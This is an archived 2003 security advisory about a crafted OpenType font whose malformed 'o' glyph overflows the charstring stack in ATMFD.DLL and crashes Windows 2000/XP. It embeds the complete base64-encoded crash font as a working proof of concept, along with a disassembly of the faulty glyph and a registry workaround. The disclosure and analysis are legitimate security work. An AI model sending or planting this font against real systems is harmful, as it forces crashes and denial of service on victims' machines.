TUCoPS :: Windows Apps :: win5915.htm

Opentype font file causes Windows to restart
7th Jan 2003 [SBWID-5915]
COMMAND

	Opentype font file causes Windows to restart

SYSTEMS AFFECTED

	 All current release of windows 2000 / XP
	 (Bug in ATMFD.DLL v ??)

PROBLEM

	Thanks to Andrew [aconnell@xtra.co.nz] post :
	
	The  attached  OpenType  font  file  will  cause  Windows   to   restart
	immediately when the file is opened by the default viewer (fontview).  I
	doubt anyone would suspect a "harmless" little font file of  being  able
	to cause such a thing to happen!
	
	
	------------1F17417B20A411B0
	Content-Type: application/octet-stream; name="restart.otf"
	Content-Transfer-Encoding: base64
	Content-Disposition: attachment; filename="restart.otf"
	
	T1RUTwAJAIAAAwAQQ0ZGIERAtN8AAACcAAAEZU9TLzJeXlwYAAAFBAAAAGBjbWFwAKECGgAABWQA
	AAEkaGVhZNZUcTcAAAaQAAAANmhoZWEFzAI+AAAG1AAAACRobXR4Br3/+AAABsgAAAAMbWF4cAAD
	UAAAAAaIAAAABm5hbWXxP5NIAAAG+AAAAxVwb3N0/58AMgAAChAAAAAgAQAEBAABAQEKcmVzdGFy
	dGVyAAEBARz4EAD4GwL4GwP4GASDZfla+K4Fzw+S+vIS1BEAAQEBCnJlc3RhcnRlcgAAAQEAAAEA
	UAADAgABAAQABwQL+IgO+IgOlfe2FZGKkoyNioqKioeMh4yIjIaMiIyGjIiMh4yKjIyMj4yNjJCM
	jYyPjJCKkIqNio2KjJmKioSMhoyHjIaMiIyHjIeNjYyPjI+MjoyQjI+Mj4yRioyVioqJioqKhoqJ
	ioeKiIqHioiKiIqHioiKh4qIioiKioONio6KkIqOio+KjoqPiYmKh4qIioeKiIqHioiKioOMio+K
	joqPio6Kj4qOio6Kj4qOio+KjoqPio2KjIqMBtAWk4qngoqNioyIjHqKin6ZjYyMjH+JjYqMfnuf
	jIyMjIyMjYyNjIOKh2aMjIyMtomNBvdzFpuKj4qNgYyIiY6KjIqMioyKjImMiYyAiomKiYqKioqK
	ioqKiYqJioSKiYyFjIiMioyJjIqMioyKjIqNio6Kj4yOjIyMjIyMjoyRio2JjImMkoqMjI2KjIyR
	ioqKiomKeoeNio2JioqKioqJiomKh4qEjIeMiIyJjIqMioyKjIqMioyKjIqNio2KjoqZjI6MjYyN
	jIyMjIyMjIyMjIyMjIyNjI2MjYyOjAbnFpmKjoqNioyKjYqMioyKjIqMioyJjIqMiIyIjH6KiIqJ
	iomKioqJioqKioqKiYqKiomKiYqIin2MiIyJjIqMiYyKjIqMioyKjIqNio2KjYqQipSMj4yNjI2M
	jYyMjIyMjIyMjIyMjI2MjIyOjI2MBvuhihWaioqKioqKZoyKmoyOjIyMjI2MjYyMjImKhoqFdIqA
	jYyNjLSKjIqMBrQWmoqKiopknIyNjIyNjI2MjIyIioKIiomMioqKjIeKgoyJioqMh4qDjYyMjLaJ
	jAa1FpqKiX6KboyJjIqAioqMioqKjIuMjLaKjIqMBqIWmYqMioyJjIqMioyJjIqMiYyJjIqMiYyK
	jImMioyJjIqMiYyKjImMioyKjIqMp4qMioyKjJaKiomKcYp5hIyKjYqMioyKjYqMio2KjIqNioyK
	jYqMio2KjIqMio2KjIqNioyKjYqMio2KjYqMioyKjIppjIqMioyKiYyGioeMjI2MtYqMiowG8xad
	ipCMmoqMfoqOio6KjImMgWSMio2KeYyNjIyMjLGBioqKioqKiYqIipCMk4yMBu0WmYqMioyJjIqM
	iYyKjImMioyJjIqMiYyKjImMioyJjIqMiYyKjImMioyJjaeKjYmMloqKiYpoioKEjIqMio2KjIqN
	ioyKjYqMio2KjIqNioyKjIqNioyKjYqMio2KjIqNioyKjYqMio2KjIqMimmMioyKg4qJjYyNjLOK
	jYqMBl1uFYyIjImMiYyKjImMio2KjYqUjI2MjIyMjIyMjI2MjIyPjJOKkIqNio6KjIqNioyKjImM
	iYyDiomKiYqKioqJioqKiIp9Bg4eoDlj/wwJAAAAAAICPwGQAAUAAAK8AooAAACMArwCigAAAd0A
	MgD6AAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAE5PTkUAQAAAAG8C7v9WAB4DwgAmAAAAAAAA
	AAAB9AK8ACAAIAAAAAAAAwAAAAMAAAAcAAEAAAAAAEwAAwABAAAAHAAEADAAAAAIAAgAAgAAAAAA
	IABv//8AAAAAACAAb///AAD/4f+TAAEAAAAAAAAAAAAGANgAAAAJAGcAAQAAAAAAAAABAAAAAAAA
	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
	AAAAAAAAAAAAAAAAAAAAAAAAAgAAUAAAAwAAAAEAAAABAAD42ttZXw889QADA+gAAAAAuj/f+gAA
	AAC6P05p//j/2gLGAhoAAAADAAIAAAAAAAAB9AAAAfQAAALV//gAAQAAAu7/VgAeAtX/+AAPAsYA
	AQAAAAAAAAAAAAAAAAAAAAMAAAATAOoAAQAAAAAAAAAkAAAAAQAAAAAAAQAJACQAAQAAAAAAAgAH
	AC0AAQAAAAAAAwAUADQAAQAAAAAABAAJACQAAQAAAAAABQAgAEgAAQAAAAAABgAJACQAAQAAAAAA
	BwBRAGgAAQAAAAAAEAAJACQAAQAAAAAAEQAHAC0AAwABBAkAAABIALkAAwABBAkAAQASAQEAAwAB
	BAkAAgAOARMAAwABBAkAAwAoASEAAwABBAkABAASAQEAAwABBAkABQBAAUkAAwABBAkABgASAQEA
	AwABBAkABwCiAYkAAwABBAkAEgASAQFDb3B5cmlnaHQgMjAwMy4gQWxsIHJpZ2h0cyByZXNlcnZl
	ZC5yZXN0YXJ0ZXJSZWd1bGFyMS4wMDA7Tk9ORTtyZXN0YXJ0ZXJPVEYgMS4wMDA7UFMgMDAxLjAw
	MTtDb3JlIDEuMC4yOVBsZWFzZSByZWZlciB0byB0aGUgQ29weXJpZ2h0IHNlY3Rpb24gZm9yIHRo
	ZSBmb250IHRyYWRlbWFyayBhdHRyaWJ1dGlvbiBub3RpY2VzLgBDAG8AcAB5AHIAaQBnAGgAdAAg
	ADIAMAAwADMALgAgAEEAbABsACAAcgBpAGcAaAB0AHMAIAByAGUAcwBlAHIAdgBlAGQALgByAGUA
	cwB0AGEAcgB0AGUAcgBSAGUAZwB1AGwAYQByADEALgAwADAAMAA7AE4ATwBOAEUAOwByAGUAcwB0
	AGEAcgB0AGUAcgBPAFQARgAgADEALgAwADAAMAA7AFAAUwAgADAAMAAxAC4AMAAwADEAOwBDAG8A
	cgBlACAAMQAuADAALgAyADkAUABsAGUAYQBzAGUAIAByAGUAZgBlAHIAIAB0AG8AIAB0AGgAZQAg
	AEMAbwBwAHkAcgBpAGcAaAB0ACAAcwBlAGMAdABpAG8AbgAgAGYAbwByACAAdABoAGUAIABmAG8A
	bgB0ACAAdAByAGEAZABlAG0AYQByAGsAIABhAHQAdAByAGkAYgB1AHQAaQBvAG4AIABuAG8AdABp
	AGMAZQBzAC4AAAAAAwAAAAAAAP+cADIAAAAAAAAAAAAAAAAAAAAAAAAAAA==
	
	------------1F17417B20A411B0--
	
	
	 Update (09 January 2003)
	 ======
	
	Kaspar  Brand  [ot@velox.ch]  sent  to   the   OpenType   mailing   list
	[http://www.topica.com/lists/opentype] and BugTraq :
	
	Further inspection of the font file shows that the  problem  is  in  the
	CFF table - or more exactly, within  the  "o"  character.  Disassembling
	the font with Just's excellent TTX
	
	 http://fonttools.sourceforge.net
	
	produces the following result for the "o" character:
	
	
	           <CharString name="o">
	             10 290 rmoveto
	             6 -1 7 1 2 -1 -1 -1 -1 -4 1 -4 1 -3 1 -5 1 -3 1 -5 1 -3 1 -4
	1 -1 1 1 1 4 1 2 1 5 1 2 1 4 1 5 -1 5 -1 2 -1 2 -1 1 14 -1 -1 -7 1 -5 1
	-4 1 -5 1 -3 1 -4 1 -4 2 2 1 4 1 4 1 3 1 5 1 4 1 4 1 6 -1 1 10 -1 -1 -2
	-1 -1 -1 -5 -1 -2 -1 -4 -1 -3 -1 -4 -1 -3 -1 -3 -1 -4 -1 -3 -1 -4 -1 -3
	-1 -3 -1 -1 -8 2 -1 3 -1 5 -1 3 -1 4 -1 3 -1 4 -2 -2 -1 -4 -1 -3 -1 -4
	-1 -3 -1 -4 -1 -3 -1 -1 -8 1 -1 4 -1 3 -1 4 -1 3 -1 4 -1 3 -1 3 -1 4 -1
	3 -1 4 -1 3 -1 4 -1 2 -1 1 -1 1 hlineto
	             69 hmoveto
	             8 -1 28 -9 -1 2 -1 1 -3 1 -17 -1 -1 -13 14 2 1 1 1 -12 -2 2
	-1 1 -13 -16 20 1 1 1 1 1 1 2 1 2 1 -8 -1 -4 -37 1 1 1 1 43 -2 2 hlineto
	             223 hmoveto
	             16 -1 4 -1 2 -10 1 -3 -2 3 -1 1 -1 1 -1 1 -1 1 -2 1 -2 1 -11
	-1 -2 -1 -2 -1 -1 -1 -1 -1 -1 -1 -1 -2 -1 -2 -1 -7 -1 -2 1 -6 1 -3 1 -1
	1 -2 1 -1 1 -1 1 -1 1 -1 2 -1 3 -1 4 1 3 1 1 1 1 1 1 3 1 6 -1 2 -2 1 -2
	1 7 -1 1 1 2 -1 1 1 6 -1 -1 -1 -1 -2 -1 -17 -4 2 -1 2 -2 -1 -1 -1 -1 -1
	-2 -1 -2 -1 -4 -1 -7 1 -4 1 -3 1 -2 1 -1 1 -1 1 -1 1 -1 1 -1 1 -1 1 -1 2
	-1 2 -1 3 -1 14 1 3 1 2 1 2 1 1 1 1 1 1 1 1 1 1 1 1 1 1 2 1 2 1 2 1 3 1
	hlineto
	
	[... some more hmoveto/hlineto stuff deleted ...]
	
	             endchar
	           </CharString>
	
	
	Some simple experiments modifying this Charstring and  reassembling  the
	font with TTX showed that the crash is caused by the  arguments  to  the
	hlineto operator. The Type 2 charstring specification
	
	 http://partners.adobe.com/asn/developer/pdfs/tn/5177.Type2.pdf
	
	defines an implementation limit of 48 for the argument  stack  (Appendix
	B, p.33) - but in some cases, the number of  arguments  to  the  hlineto
	operator in this particular Charstring clearly exceed this limit.
	
	In the end, this  apparently  leads  to  a  page  fault  (i.e.  a  "blue
	screen") in ATMFD.DLL (the Type1/CFF  font  driver)  -  which  shouldn't
	happen in any case, of course. I guess the folks at Adobe  need  to  fix
	this.
	
	BTW, checking the font with CFFChecker from the  OpenType  FDK  gives  a
	"Type 2  stack  overflow"  for  this  character  (which  is  not  really
	surprising, is it?).
	
	--snipp--
	
	This  specific  flavor  of  an  OpenType  font   (CFF   outlines,   i.e.
	"PostScript" data) is  only  supported  natively  by  Windows  2000  and
	later. For previous Windows versions, you need ATM (Adobe Type  Manager)
	to display such a font. Please note that  the  crash  only  occurs  when
	trying to render the "o" character (that's what  fontview.exe  tries  to
	do, of course).
	
	As far as the creation of  an  embedded  font  for  IE  (.eot,  embedded
	OpenType) is concerned, I'm not sure if it's  possible  to  trigger  the
	bug this way. When installing  the  "restarter"  font  and  listing  the
	fonts available for embedding in WEFT, Microsoft's Web  Embedding  Fonts
	Tool (the only publicly available tool I know of to create such  fonts),
	OpenType fonts with CFF outline data  do  not  appear  in  the  list  of
	available fonts. I suppose WEFT is currently limited to  embed  OpenType
	fonts with TrueType outlines ("glyf" table) or plain PostScript  Type  1
	fonts (.pfb file suffix). The .eot format is not documented, as  far  as
	I know, so creating such a font manually would  probably  require  quite
	some experimenting, and even then  the  question  remains  if  IE  would
	actually be  able  to  deal  with  this  font  format  and  display  the
	characters.

SOLUTION

	 Patch
	 =====
	 
	?
	
	 Workaround
	 ==========
	
	Steven Tucker says :
	
	On XP Professional SP1 it causes a bugcheck in ATMFD.DLL.  According  to
	the properties for this DLL this is the Adobe Type Manager driver.
	
	The bugcheck code is PAGE_FAULT_IN_NONPAGED_AREA @ Base+0x28A75.
	
	You can delete the registry key:
	
	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Font Drivers
		
	This will eliminate the immediate problem, but will remove type  1  font
	support.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH